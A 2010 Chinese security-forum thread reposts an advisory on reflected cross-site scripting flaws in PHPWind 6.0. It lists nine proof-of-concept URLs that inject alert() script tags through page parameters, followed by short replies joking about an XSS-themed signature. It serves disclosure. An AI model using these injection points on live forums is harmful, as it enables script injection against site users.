熙雅 发表于 2010-3-24 23:03

PHPWind 6.0多个跨站脚本漏洞

PHPWind是一款国内比较流行的基于PHP的Web论坛程序。

PHPWind在访客注销时没有正确的过滤提交给hack.php、search.php、read.php、post.php、thread.php、 profile.php、sort.php、message.php、userpay.php等页面的请求参数,远程攻击者可以提交恶意请求执行跨站脚本攻击。
测试代码:
http://www.hackqing.cn/hack.php?H_name=bank"><script>alert(/qing/);</script>
http://www.hackqing.cn/search.php?asc=desc"><script>alert(/qing/);</script>
http://www.hackqing.cn/read.php?nowtime="><script>alert(/qing/);</script>
http://www.hackqing.cn/post.php?fid=10"><script>alert(/qing/);</script>
http://www.hackqing.cn/profile.php?action=forumright"><script>alert(/qing/);</script>
http://www.hackqing.cn/thread.php?skinco=black"><script>alert(/qing/);</script>
http://www.hackqing.cn/message.php?action=scout"><script>alert(/qing/);</script>
http://www.hackqing.cn/sort.php?skinco=black"><script>alert(/qing/);</script>
http://www.hackqing.cn/userpay.php?skinco=black"><script>alert(/qing/);</script>
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.phpwind.net

特洛伊剑客 发表于 2010-3-28 00:40

<Script>alert("XSS it then Hack it!") </Script>

mirk 发表于 2010-4-2 01:04

<Script>alert("Check it then Hack it! Debug it then Crack it! ") </Script>


你的签名很有趣啊

mirk 发表于 2010-4-2 01:04

alert("Check it then Hack it! Debug it then Crack it! ")


你的签名很有趣啊
mirk 发表于 2010-4-2 01:04 http://bbs.antiy.cn/images/common/back.gif

特洛伊剑客 发表于 2010-4-2 08:56


mirk 发表于 2010-4-2 01:04 http://bbs.antiy.cn/images/common/back.gif


    必须的啊!~呵呵!~玩的就是个性!嘿嘿!~
页: [1]
查看完整版本: PHPWind 6.0多个跨站脚本漏洞